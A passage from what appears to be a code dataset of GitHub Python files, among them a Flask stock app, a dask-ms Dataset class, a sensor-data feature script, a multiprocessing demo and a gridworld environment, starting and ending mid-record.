j13\n\nj1.draw()\nj2.draw()\nj3.draw()\nj4.draw()\nj5.draw()\nj6.draw()\nj7.draw()\nj8.draw()\nj9.draw()\nj10.draw()\nj11.draw()\nj12.draw()\nj13.draw()\n","repo_name":"Abi-Humanoid/Inverse_Kinematics","sub_path":"Laura/Kinematics/SetupJoints_FK_ViaKajitaMethod.py","file_name":"SetupJoints_FK_ViaKajitaMethod.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6900594255","text":"from models import (UserOrm, UserModel, UserWithHashModel)\n\ndef get_user_txn(session, username):\n if username is not None:\n user = session.query(UserOrm).filter(\n UserOrm.username == username).first()\n \n if(user is None):\n return False\n \n return UserWithHashModel.from_orm(user)\n","repo_name":"sdairs/vue3-fastapi-oath2-jwt-demo","sub_path":"backend/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"18749874876","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport joblib\nfrom utils import normalize_MPU9250_data, split_df\n# from ChairAnalyzerOld import ChairAnalyser\nfrom datetime import datetime\n\nplt.interactive(True)\npd.options.display.max_columns = 15\npic_prefix = 'pic/'\ndata_path = 'Anonimised Data/Data'\nprocessed_data_path = 'data/players_data_processed'\n\n# data_dict = joblib.load('data/data_dict')\nsessions_dict = joblib.load('data/sessions_dict')\ngamedata_dict = joblib.load('data/gamedata_dict')\n\ncommon_keys = set(sessions_dict.keys()) & set(gamedata_dict.keys())\n\ngame_events_features_dict = {}\n\nfor session_id in common_keys:\n if 'schairlog' not in sessions_dict[session_id]:\n continue\n\n schairlog = sessions_dict[session_id]['schairlog'].copy()\n times_is_killed = gamedata_dict[session_id]['times_is_killed']\n times_kills = gamedata_dict[session_id]['times_kills']\n\n # schairlog['time'] = pd.to_datetime(schairlog['time']).apply(lambda x: x.timestamp())\n # times_is_killed = [x.timestamp() for x in pd.to_datetime(times_is_killed)]\n # times_kills = [x.timestamp() for x in pd.to_datetime(times_kills)]\n\n # time_start = 0\n # time_end = 5\n duration = 3\n time_start_end_list = [(0, duration), (-duration, 0), (-duration, duration)]\n\n sensors_list = ['acc_x', 'acc_y', 'acc_z', 'gyro_x', 'gyro_y', 'gyro_z']\n\n # for time_kills in times_kills:\n event_reactions_dict = {}\n\n for times_list, times_name in zip([times_is_killed, times_kills], ['times_is_killed', 'times_kills']):\n for time_start, time_end in time_start_end_list:\n name = f\"{times_name}_{time_start}_{time_end}\"\n std_list = []\n\n for time_event in times_list:\n timediff = schairlog['time'] - time_event\n mask = (time_start <= timediff) & (timediff < time_end)\n std = schairlog.loc[mask, sensors_list].std() # TODO: consider other sensors\n\n std_list.append(std)\n\n reaction_stats = pd.DataFrame(std_list).median() # It should be compared with mean std on the chair\n event_reactions_dict[name] = reaction_stats\n\n df_event_reactions = pd.DataFrame(event_reactions_dict) #.round(4).values\n\n features_dict = {}\n\n for sensor_name in df_event_reactions.index:\n for column in df_event_reactions.columns:\n feature_name = f\"{sensor_name}__{column}\"\n features_dict[feature_name] = df_event_reactions.loc[sensor_name, column]\n\n ### KDA-like objectives\n n_deaths = len(times_is_killed)\n n_kills = len(times_kills)\n\n n_deaths = max(n_deaths, 0.001) # bound\n\n kill_death_ratio = min(n_kills / n_deaths, 10)\n features_dict['Kill Death Ratio'] = kill_death_ratio\n # features_dict['kill_death_ratio'] = kill_death_ratio\n\n game_events_features_dict[session_id] = features_dict\n\n\n\ndf_game_events_features = pd.DataFrame(game_events_features_dict).T\ndf_game_events_features.reset_index(inplace=True)\ndf_game_events_features.rename(columns={'index': 'session_id'}, inplace=True)\ndf_game_events_features.to_csv('data/game_events_features.csv', index=False)\n\n\n\n\n\n# schairlog['acc_x'].std()\n#\n#\n# schairlog['time'] = pd.to_datetime(schairlog['time'])\n# schairlog_ = schairlog.set_index(['time'])\n#\n#\n# index_sample = schairlog_.index[5]\n#\n# schairlog_.loc[schairlog_.index < index_sample, :]\n#\n#\n# schairlog['time'].iloc[0]\n#\n# data_dict.keys()\n# gamedata_dict.keys()\n\n\n\n\n\n\n\n\n\n","repo_name":"smerdov/CS_GO_Sensors_Data_Analysis","sub_path":"ChairGamedataProcessing.py","file_name":"ChairGamedataProcessing.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3695359909","text":"import argparse\n\nimport seb.operations as op\n\ndef construct_parser():\n parser = argparse.ArgumentParser(description='Collects SEB fund data')\n return parser\n\nif __name__ == \"__main__\":\n parser = construct_parser()\n args = parser.parse_args()\n\n op.load_settings()\n op.collect()\n","repo_name":"engelvinter/Xtrend","sub_path":"seb_collect.py","file_name":"seb_collect.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5789885275","text":"from flask import render_template, flash, redirect, url_for, request\nfrom app import app, db\nfrom app.forms import SearchForm\nfrom app.models import Stock\nimport xlrd \n\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n# path = \"data/svm_testing.xlsx\" #downPath承接上面下载文件的路径,这个读取文件路径都是可以换成自己的\n# workbook = xlrd.open_workbook(path) #打开excel文件\n\n# Data_sheet = workbook.sheets()[0] # 通过索引获取\n# rowNum = Data_sheet.nrows # sheet行数\n# colNum = Data_sheet.ncols # sheet列数\n \n\n# list = []\n \n# for i in range(rowNum):\n# rowlist = []\n# for j in range(colNum):\n# rowlist.append(Data_sheet.cell_value(i, j))\n# list.append(rowlist)\n \n# del list[0] #删掉第一行,第一行获取的是文件的头,一般不用插到数据库里面\n \n# # 接下来是把数据插到数据库里面,以下是我自己的数据库,大家可以根据自己的需要自行处理\n# print(Data_sheet.cell_value(1, 2))\n\n# for a in list: \n# stock = Stock()\n# stock.stockname= a[0]\n# stock.trend = a[1]\n# stock.accuracy = a[2]\n# stock.risk = a[3]\n# db.session.add(stock)\n# db.session.commit() \n\n\n\n page = request.args.get('page', 1, type=int)\n stocks = Stock.query.order_by(Stock.id).paginate(\n page, app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('index', page=stocks.next_num) \\\n if stocks.has_next else None\n prev_url = url_for('index', page=stocks.prev_num) \\\n if stocks.has_prev else None\n\n form = SearchForm()\n if form.validate_on_submit():\n stocks = Stock.query.filter_by(stockname=form.stockid.data).paginate(\n page, app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('index', page=stocks.next_num) \\\n if stocks.has_next else None\n prev_url = url_for('index', page=stocks.prev_num) \\\n if stocks.has_prev else None\n redirect(url_for('index'))\n \n \n return render_template('index.html', title = 'Home', stocks = stocks.items, form = form, next_url=next_url,\n prev_url=prev_url )\n\n \n@app.shell_context_processor\ndef make_shell_context():\n return {'db': db, 'Stock': Stock}","repo_name":"leoneong/stock_analytic","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20023643768","text":"import os\nimport pandas as pd\nimport numpy as np\nimport gc\nimport math\n\ndef reduce_memory_usage(df, features):\n for feature in features:\n item = df[feature].astype(np.float16)\n df[feature] = item\n del item\n gc.collect()\n\n\ndef reduce_memory_usage(df, features):\n for feature in features:\n item = df[feature].astype(np.float16)\n df[feature] = item\n del item\n gc.collect()\n\nn_features = 300\nfeatures = [str(i) for i in range(n_features)]\nfeature_columns = ['stock_id', 'time_id'] + features\ntrain = pd.read_csv('./train.csv')\nreduce_memory_usage(train, features + [\"label\"])\ntrain.to_pickle(\"train.pkl\")\n","repo_name":"jypeng28/Solution_Stock_Yield_Forecast","sub_path":"to_pickle.py","file_name":"to_pickle.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72771331752","text":"import math\n\ndef alphabetizeAttributeString(data):\n\tfor i in range(len(data)):\n\t\tnewDict = {}\n\t\tfor k,v in data[i].items():\n\t\t\tnewDict[''.join([c for c in k if c.isalpha() or c == ' '])] = v;\n\t\tdata[i] = newDict\n\ndef convertToNumber(data):\n\tfor ex in data:\n\t\tfor key in ex.keys():\n\t\t\ttry:\n\t\t\t\tex[key] = float(ex[key])\n\t\t\texcept ValueError:\n\t\t\t\tex[key] = ex[key]\n\ndef decapitalize(data):\n\tfor ex in data:\n\t\tfor key in ex.keys():\n\t\t\tif ex[key].isalpha(): ex[key] = ex[key].lower()\n\ndef processData(data):\n\talphabetizeAttributeString(data)\n\t#decapitalize names\n\tdecapitalize(data)\n\t#convert numeric attributes to numbers.\n\tconvertToNumber(data)\n\n\n\t\n","repo_name":"thomasyang1207/PredictFuture","sub_path":"Scripts/processData.py","file_name":"processData.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16310362205","text":"# -*- coding: utf-8 -*-\n\nfrom multiprocessing import Process\nfrom time import time,sleep\nimport os \n\n\n\"\"\"\nis_alive() # 判断进程是否还在执行\njoin() # 是否等待进程实例执行结束,或等待多少秒\nstart() # 启动进程实例(创建子进程) \nrun() # 如果没有给定target参数,对这个对象调用start()方法时,将执行对象中的run()方法\nterninate() # 不管任务是否完成,立即停止\nname # 当前进程实例名,默认从Process-1开始,一次递增\npid # 当前进程实例的pid值\n\"\"\"\n\n\n# 继承Process类\nclass SubProcess(Process):\n # 重写__init__方法\n def __init__(self,interval,name=\"\"):\n Process.__init__(self) #调用Process父类的初始化方法\n self.interval = interval # 接收参数interval\n if name: # 判断传递的参数name是否存在\n self.name = name \n \n # 重写Process类的run()方法\n def run(self):\n print(\"子进程(%s)开始执行,父进程为(%s)\"%(os.getpid(),os.getppid()))\n t_start= time()\n sleep(self.interval)\n t_end = time()\n print(\"子进程(%s)执行时间为%0.2f秒\"%(os.getpid(),t_end - t_start))\n \n \ndef main():\n print(\"主进程开始。。。。\")\n print(\"父进程PID:%s\"%os.getppid())\n p1 = SubProcess(interval=1,name=\"child_1\")\n p2 = SubProcess(interval=2,name=\"child_2\")\n p1.start()\n p2.start()\n\n print(\"p1.is_alive=%s\"%p1.is_alive())\n print(\"p1.is_alive=%s\"%p1.is_alive())\n\n print(\"p1.name=%s\"%p1.name)\n print(\"p1.pid=%s\"%p1.pid)\n print(\"p2.name=%s\"%p2.name)\n print(\"p2.pid=%s\"%p2.pid)\n print(\"等待子进程结束。。。。。\")\n p1.join()\n p2.join()\n print(\"主进程结束.....\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Raylively/python","sub_path":"多进程/process_class.py","file_name":"process_class.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74482294311","text":"# -*- coding: utf-8 -*-\n\ntry:\n from collections.abc import Mapping # python 3.8\nexcept ImportError:\n from collections import Mapping\n\nfrom collections import OrderedDict\n\nimport dask\nimport dask.array as da\nfrom dask.highlevelgraph import HighLevelGraph\nimport numpy as np\n\ntry:\n import xarray as xr\nexcept ImportError:\n xr = None\n\n\nclass DimensionInferenceError(ValueError):\n pass\n\n\nclass ChunkInferenceError(ValueError):\n pass\n\n\ndef data_var_dims(data_vars):\n \"\"\"Returns a {dim: size} dictionary constructed from `data_vars`\"\"\"\n dims = {}\n\n for k, var in data_vars.items():\n for d, s in zip(var.dims, var.shape):\n if d in dims and not np.isnan(s) and s != dims[d]:\n raise DimensionInferenceError(\n \"Existing dimension size %s for \"\n \"dimension '%s' is inconsistent \"\n \"with same dimension %s of \"\n \"array %s\" % (s, d, dims[d], k)\n )\n\n dims[d] = s\n\n return dims\n\n\ndef data_var_chunks(data_vars):\n \"\"\"Returns a {dim: chunks} dictionary constructed from `data_vars`\"\"\"\n chunks = {}\n\n for k, var in data_vars.items():\n if not isinstance(var.data, da.Array):\n continue\n\n for d, c in zip(var.dims, var.chunks):\n if d in chunks and c != chunks[d]:\n raise ChunkInferenceError(\n \"Existing chunking %s for \"\n \"dimension '%s' is inconsistent \"\n \"with chunking %s for the \"\n \"same dimension of array %s\" % (c, d, chunks[d], k)\n )\n\n chunks[d] = c\n\n return chunks\n\n\ndef as_variable(args):\n if not isinstance(args, tuple):\n raise TypeError(f\"args ({type(args)}) must be a tuple\")\n\n try:\n return Variable(*args)\n except TypeError as e:\n if \"takes at most\" in str(e):\n raise TypeError(\n \"Invalid number of arguments in Variable tuple. \"\n \"Must be a size 2 to 5 tuple of the form \"\n \"(dims, array[, attrs[, encoding[, fastpath]]]) \"\n )\n\n raise\n\n\ndef _convert_to_variable(k, v):\n \"\"\"Converts ``v`` to a :class:`daskms.dataset.Variable`\"\"\"\n if isinstance(v, Variable):\n return v\n\n if xr and isinstance(v, (xr.DataArray, xr.Variable)):\n return as_variable((v.dims, v.data, v.attrs))\n\n if not isinstance(v, (tuple, list)):\n raise ValueError(\n \"'%s' must be a size 2 to 5 tuple of the form\"\n \"(dims, array[, attrs[, encoding[, fastpath]]]) \"\n \"tuple. Got '%s' instead,\" % (k, type(v))\n )\n\n return as_variable(v)\n\n\nif xr is not None:\n from xarray import Dataset, Variable\nelse:\n # This class duplicates xarray's Frozen class in\n # https://github.com/pydata/xarray/blob/master/xarray/core/utils.py\n # See https://github.com/pydata/xarray/blob/master/LICENSE\n class Frozen(Mapping):\n \"\"\"\n Wrapper around an object implementing the Mapping interface\n to make it immutable.\n \"\"\"\n\n __slots__ = \"mapping\"\n\n def __init__(self, mapping):\n self.mapping = mapping\n\n def __getitem__(self, key):\n return self.mapping[key]\n\n def __iter__(self):\n return iter(self.mapping)\n\n def __len__(self):\n return len(self.mapping)\n\n def __contains__(self, key):\n return key in self.mapping\n\n def copy(self):\n return self.mapping.copy()\n\n def __repr__(self):\n return f\"{type(self).__name__}({self.mapping})\"\n\n class Variable:\n \"\"\"\n Replicates a minimal subset of `xarray Variable\n `_'s\n functionality.\n Exists to allows ``xarray`` to be an optional ``dask-ms`` dependency.\n \"\"\"\n\n def __init__(self, dims, data, attrs=None):\n \"\"\"\n Parameters\n ----------\n dims : str or tuple\n Dimension schema. e.g. :code:`('row', 'chan', 'corr')`\n data : :class:`numpy.ndarray` or :class:`dask.array.Array`\n Array\n attrs : dict or None\n Array metadata\n \"\"\"\n if not isinstance(dims, (tuple, list)):\n dims = (dims,)\n\n self.dims = dims\n self.data = data\n self.attrs = attrs or {}\n\n @property\n def dtype(self):\n \"\"\"Array data type\"\"\"\n return self.data.dtype\n\n @property\n def chunks(self):\n \"\"\"Array chunks if wrapping a dask array else None\"\"\"\n if isinstance(self.data, da.Array):\n return self.data.chunks\n\n return None\n\n @property\n def values(self):\n \"\"\"Returns actual array values\"\"\"\n if isinstance(self.data, da.Array):\n return self.data.compute()\n\n return self.data\n\n @property\n def shape(self):\n \"\"\"Array shape\"\"\"\n return self.data.shape\n\n @property\n def ndim(self):\n \"\"\"Number of array dimensions\"\"\"\n return self.data.ndim\n\n def __dask_keys__(self):\n return self.data.__dask_keys__()\n\n def __dask_graph__(self):\n if isinstance(self.data, da.Array):\n return self.data.__dask_graph__()\n\n return None\n\n def __dask_layers__(self):\n return self.data.__dask_layers__()\n\n @property\n def __dask_optimize__(self):\n return self.data.__dask_optimize__\n\n @property\n def __dask_scheduler__(self):\n return self.data.__dask_scheduler__\n\n @staticmethod\n def finalize_compute(results, fn, args, name, dims, attrs):\n return Variable(dims, fn(results, *args), attrs=attrs)\n\n def __dask_postcompute__(self):\n fn, args = self.data.__dask_postcompute__()\n\n name = self.data.name if isinstance(self.data, da.Array) else None\n args = (fn, args, name, self.dims, self.attrs)\n return (self.finalize_compute, args)\n\n @staticmethod\n def finalize_persist(results, fn, args, name, dims, attrs):\n results = {k: v for k, v in results.items() if k[0] == name}\n return Variable(dims, fn(results, *args), attrs=attrs)\n\n def __dask_postpersist__(self):\n fn, args = self.data.__dask_postpersist__()\n args = (fn, args, self.data.name, self.dims, self.attrs)\n return (self.finalize_persist, args)\n\n class Dataset:\n \"\"\"\n Replicates a minimal subset of `xarray Dataset\n `_'s\n functionality.\n Exists to allows ``xarray`` to be an optional ``dask-ms`` dependency.\n \"\"\"\n\n def __init__(self, data_vars, coords=None, attrs=None):\n \"\"\"\n Parameters\n ----------\n data_vars: dict\n Dictionary of variables of the form\n :code:`{name: (dims, array [, attrs])}`. `attrs` can\n be optional.\n coords : dict, optional\n Dictionary of coordinates of the form\n :code:`{name: (dims, array [, attrs])}`. `attrs` can\n be optional.\n attrs : dict, optional\n Dictionary of Dataset attributes\n \"\"\"\n self._data_vars = {\n k: _convert_to_variable(k, v) for k, v in data_vars.items()\n }\n\n if coords is not None:\n self._coords = {\n k: _convert_to_variable(k, v) for k, v in coords.items()\n }\n else:\n self._coords = {}\n\n self._attrs = attrs or {}\n\n @property\n def attrs(self):\n \"\"\"Dataset attributes\"\"\"\n return self._attrs\n\n @property\n def dims(self):\n \"\"\"A :code:`{dim: size}` dictionary\"\"\"\n return data_var_dims(self._data_vars)\n\n sizes = dims\n\n @property\n def chunks(self):\n \"\"\"A :code:`{dim: chunks}` dictionary\"\"\"\n return data_var_chunks(self._data_vars)\n\n @property\n def data_vars(self):\n \"\"\"Dataset variables\"\"\"\n return Frozen(self._data_vars)\n\n @property\n def coords(self):\n \"\"\"Dataset coordinates\"\"\"\n return Frozen(self._coords)\n\n def compute(self, **kwargs):\n \"\"\"\n Calls dask compute on the dask arrays in this Dataset,\n returning a new Dataset.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing computed arrays.\n \"\"\"\n\n # Compute dask arrays separately\n dask_data = {}\n data_vars = {}\n\n # Split variables into dask and other data\n for k, v in self._data_vars.items():\n if isinstance(v.data, da.Array):\n dask_data[k] = v\n else:\n data_vars[k] = v\n\n # Compute dask arrays if present and add them to data variables\n if len(dask_data) > 0:\n data_vars.update(da.compute(dask_data, **kwargs)[0])\n\n return Dataset(data_vars, coords=self._coords, attrs=self._attrs.copy())\n\n def assign(self, **kwargs):\n r\"\"\"\n Creates a new Dataset from existing variables combined with\n those supplied in \\*\\*kwargs.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing existing variables combined with\n those in \\*\\*kwargs.\n \"\"\"\n data_vars = self._data_vars.copy()\n data_vars.update(**kwargs)\n\n return Dataset(data_vars, attrs=self._attrs.copy(), coords=self._coords)\n\n def assign_coords(self, **kwargs):\n r\"\"\"\n Creates a new Dataset from existing attributes combined with\n those supplied in \\*\\*kwargs.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing existing attributes combined with\n those in \\*\\*kwargs.\n \"\"\"\n\n coords = {k: as_variable(v) for k, v in kwargs.items()}\n return Dataset(self._data_vars, attrs=self._attrs, coords=coords)\n\n def assign_attrs(self, **kwargs):\n r\"\"\"\n Creates a new Dataset from existing attributes combined with\n those supplied in \\*\\*kwargs.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing existing attributes combined with\n those in \\*\\*kwargs.\n \"\"\"\n\n attrs = self._attrs.copy()\n attrs.update(kwargs)\n return Dataset(self._data_vars, attrs=attrs, coords=self._coords)\n\n @staticmethod\n def _drop_internal(mapping, names, errors=\"raise\"):\n if isinstance(names, (tuple, list, set)):\n names = set(names)\n else:\n names = set([names])\n\n if errors == \"raise\":\n mapping = mapping.copy()\n for n in names:\n try:\n del mapping[n]\n except KeyError:\n raise ValueError(f\"{n} does not exist on Dataset\")\n elif errors == \"ignore\":\n return {k: v for k, v in mapping.items() if k not in names}\n else:\n raise ValueError(f\"errors '{errors}' not in \" f\"('raise', 'ignore')\")\n\n def drop_vars(self, names, *, errors):\n \"\"\"Drop variables from the Dataset\n\n Parameters\n ----------\n names : str or iterable of str\n Variable names\n errors : {\"raise\", \"ignore\"}\n If \"raise\", a ValueError is raised if the\n specified variables are missing.\n If \"ignore\", the missing variables are ignored.\n\n Returns\n -------\n dataset : Dataset\n New dataset without the specified variables\n \"\"\"\n data_vars = self._drop_internal(self.data_vars, names, errors)\n coords = self._drop_internal(self.coords, names, errors)\n return Dataset(data_vars, coords=coords, attrs=self.attrs.copy())\n\n def __getitem__(self, name):\n try:\n return self._data_vars[name]\n except KeyError:\n pass\n\n try:\n return self._coords[name]\n except KeyError:\n pass\n\n try:\n return self._attrs[name]\n except KeyError:\n raise AttributeError(f\"Invalid item {name}\")\n\n def __getattr__(self, name):\n try:\n return self._data_vars[name]\n except KeyError:\n pass\n\n try:\n return self._coords[name]\n except KeyError:\n pass\n\n try:\n return self._attrs[name]\n except KeyError:\n raise AttributeError(f\"Invalid Attribute {name}\")\n\n def copy(self):\n \"\"\"Returns a copy of the Dataset\"\"\"\n return Dataset(\n self._data_vars, coords=self._coords, attrs=self._attrs.copy()\n )\n\n def __dask_graph__(self):\n graphs = {k: v.__dask_graph__() for k, v in self.data_vars.items()}\n # Excise anything that is not a dask collection\n graphs = {k: v for k, v in graphs.items() if v is not None}\n\n if len(graphs) > 0:\n return HighLevelGraph.merge(*graphs.values())\n\n return None\n\n def __dask_keys__(self):\n return [\n v.__dask_keys__()\n for v in self._data_vars.values()\n if dask.is_dask_collection(v)\n ]\n\n def __dask_layers__(self):\n return sum(\n [\n v.__dask_layers__()\n for v in self._data_vars.values()\n if dask.is_dask_collection(v)\n ],\n (),\n )\n\n @property\n def __dask_optimize__(self):\n return da.Array.__dask_optimize__\n\n @property\n def __dask_scheduler__(self):\n return da.Array.__dask_scheduler__\n\n @staticmethod\n def finalize_compute(results, info, coords, attrs):\n data_vars = OrderedDict()\n rev_results = list(results[::-1])\n\n for (dask_collection, k, v) in info:\n if dask_collection:\n fn, args = v\n r = rev_results.pop()\n data_vars[k] = fn(r, *args)\n else:\n data_vars[k] = v\n\n return Dataset(data_vars, coords=coords, attrs=attrs)\n\n def __dask_postcompute__(self):\n data_info = [\n (True, k, v.__dask_postcompute__())\n if dask.is_dask_collection(v)\n else (False, k, v)\n for k, v in self._data_vars.items()\n ]\n return self.finalize_compute, (data_info, self._coords, self._attrs)\n\n @staticmethod\n def finalize_persist(graph, info, coords, attrs):\n data_vars = OrderedDict()\n\n for dask_collection, k, v in info:\n if dask_collection:\n fn, args = v\n data_vars[k] = fn(graph, *args)\n else:\n data_vars[k] = v\n\n return Dataset(data_vars, coords=coords, attrs=attrs)\n\n def __dask_postpersist__(self):\n data_info = [\n (True, k, v.__dask_postpersist__())\n if dask.is_dask_collection(v)\n else (False, k, v)\n for k, v in self._data_vars.items()\n ]\n return self.finalize_persist, (data_info, self._coords, self._attrs)\n","repo_name":"ratt-ru/dask-ms","sub_path":"daskms/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":16378,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"6590154896","text":"import torch\nimport argparse\nimport datetime\nfrom setup_functions import *\nfrom configs.experiment_configs import *\n\n#default_experiment = 'default'\ndefault_experiment = 'c2'\nrun = 'run_2'\n\nparser = argparse.ArgumentParser(description='Contrastive Predictive Coding Training')\nparser.add_argument('--experiment', default=default_experiment, type=str)\nparser.add_argument('--name', default='classification_model_' + datetime.datetime.today().strftime('%Y-%m-%d') + '_' + run, type=str)\n\n\ndef main(experiment='default', name=None):\n dev = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n print(\"using device\", dev)\n\n settings = experiments[experiment]\n\n if name is not None:\n settings['snapshot_config']['name'] = name\n\n model, preprocessing_module = setup_classification_model(cqt_params=settings['cqt_config'],\n model_params=settings['model_config'])\n\n model, snapshot_manager, continue_training_at_step = setup_snapshot_manager(model=model,\n args_dict=settings['snapshot_config'],\n try_proceeding=True)\n\n trainer = setup_classification_trainer(model,\n snapshot_manager,\n preprocessing_module=preprocessing_module,\n dataset_args=settings['dataset_config'],\n trainer_args=settings['training_config'],\n dev=dev)\n\n print(\"training set length:\", len(trainer.dataset))\n print(\"validation set length:\", len(trainer.validation_set))\n\n try:\n trainer.logger.writer.add_text('configuration', experiment, 0)\n except:\n print(\"unable to write expriment to tensorboard\")\n\n trainer.train(batch_size=settings['training_config']['train_batch_size'],\n epochs=settings['training_config']['max_epochs'],\n lr=settings['training_config']['learning_rate'],\n num_workers=8,\n continue_training_at_step=continue_training_at_step)\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n main(args.experiment, args.name)\n","repo_name":"vincentherrmann/constrastive-predictive-coding-audio","sub_path":"classification_script.py","file_name":"classification_script.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25648611130","text":"import datetime\n\nfrom collections import namedtuple\nfrom datetime import timedelta\nfrom typing import Any, Optional\n\nfrom django.utils import timezone\n\nfrom haupt.common.options.option_owners import OptionOwners\n\n\nclass CachedOptionSpec(namedtuple(\"CachedOptionSpec\", \"value datetime\")):\n pass\n\n\nclass MemoryCacheManager:\n INVALIDED_OPTION = \"INVALIDED_OPTION\"\n\n def __init__(self):\n self._state = {}\n\n def clear_key(self, key: str, owners: Optional[OptionOwners] = None):\n if owners:\n key = f\"{key}:{owners}\"\n self._state.pop(key, None)\n\n def clear(self):\n self._state = {}\n\n @classmethod\n def is_valid_value(cls, value: Any):\n return value != cls.INVALIDED_OPTION\n\n @staticmethod\n def is_valid_cache(value_datetime: datetime.datetime) -> bool:\n return timezone.now() < value_datetime\n\n def get_from_cache(self, key: str, owners: Optional[OptionOwners] = None) -> Any:\n if owners:\n key = f\"{key}:{owners}\"\n cached_option = self._state.get(key)\n if cached_option and self.is_valid_cache(cached_option.datetime):\n return cached_option.value\n self.clear_key(key=key)\n return self.INVALIDED_OPTION\n\n def set_to_cache(\n self, key: str, value: Any, ttl: int, owners: Optional[OptionOwners] = None\n ):\n if ttl <= 0 or value is None:\n return\n if owners:\n key = f\"{key}:{owners}\"\n self._state[key] = CachedOptionSpec(\n value=value, datetime=timezone.now() + timedelta(seconds=ttl)\n )\n","repo_name":"polyaxon/haupt","sub_path":"haupt/haupt/common/memory_manager.py","file_name":"memory_manager.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":452,"dataset":"github-code","pt":"72"} +{"seq_id":"22170147915","text":"import sys\nfrom six import StringIO\nfrom gym import utils\nfrom gym.envs.toy_text import discrete\nimport numpy as np\n\nMAP = [\n\t\"╔═════════╗\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"╚═════════╝\",\n]\n\n\nclass GridworldEnv(discrete.DiscreteEnv):\n\t\"\"\"\n\tGridworld\n\t\n\tActions: \n\tThere are 4 discrete deterministic actions:\n\t- 0: move UP\n\t- 1: move DOWN\n\t- 2: move LEFT\n\t- 3: move RIGHT \n\t\n\tRewards: \n\tThere is a reward of -1 for each action.\n\t\n\tRendering:\n\t- yellow: agent\n\t- blue 'G': destination\n\t\"\"\"\n\tmetadata = {'render.modes': ['human', 'ansi']}\n\n\tdef __init__(self, model=None):\n\t\tself.desc = np.asarray(MAP,dtype='U')\n\n\t\tnS = 625\n\t\tnR = 5\n\t\tnC = 5\n\t\tmaxR = nR-1\n\t\tmaxC = nC-1\n\t\tisd = np.zeros(nS)\n\t\tnA = 4\n\t\tP = {s : {a : [] for a in range(nA)} for s in range(nS)}\n\n\t\tself.w_pr = np.zeros(5,dtype=np.float32) if model is None else model[0]\n\t\tself.w_pc = np.zeros(5,dtype=np.float32) if model is None else model[1]\n\t\tself.w_gr = np.zeros(5,dtype=np.float32) if model is None else model[2]\n\t\tself.w_gc = np.zeros(5,dtype=np.float32) if model is None else model[3]\n\n\t\tfor row in range(5):\n\t\t\tfor col in range(5):\n\t\t\t\tfor row_g in range(5):\n\t\t\t\t\tfor col_g in range(5):\n\t\t\t\t\t\tstate = self.encode(row, col, row_g, col_g)\n\t\t\t\t\t\t#if (row, col) != (row_g, col_g):\n\t\t\t\t\t\tprob = self.initialProb(row,col,row_g,col_g)\n\t\t\t\t\t\tisd[state] += prob\n\t\t\t\t\t\tfor a in range(nA):\n\t\t\t\t\t\t\t# defaults\n\t\t\t\t\t\t\tnewrow, newcol = row, col\n\t\t\t\t\t\t\treward = -1\n\t\t\t\t\t\t\tdone = False\n\n\t\t\t\t\t\t\tif a==0:\n\t\t\t\t\t\t\t\tnewrow = max(row-1, 0)\n\t\t\t\t\t\t\telif a==1:\n\t\t\t\t\t\t\t\tnewrow = min(row+1, maxR)\n\t\t\t\t\t\t\telif a==2:\n\t\t\t\t\t\t\t\tnewcol = max(col-1, 0)\n\t\t\t\t\t\t\telif a==3:\n\t\t\t\t\t\t\t\tnewcol = min(col+1, maxC)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif (newrow, newcol) == (row_g, col_g):\n\t\t\t\t\t\t\t\tdone = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tnewstate = self.encode(newrow, newcol, row_g, col_g)\n\t\t\t\t\t\t\tP[state][a].append((1.0, newstate, reward, done))\n\n\t\tdiscrete.DiscreteEnv.__init__(self, nS, nA, P, isd)\n\t\n\tdef initialProb(self, agentrow, agentcol, goalrow, goalcol):\n\t\tp_r = np.exp(self.w_pr[agentrow])/np.sum(np.exp(self.w_pr))\n\t\tp_c = 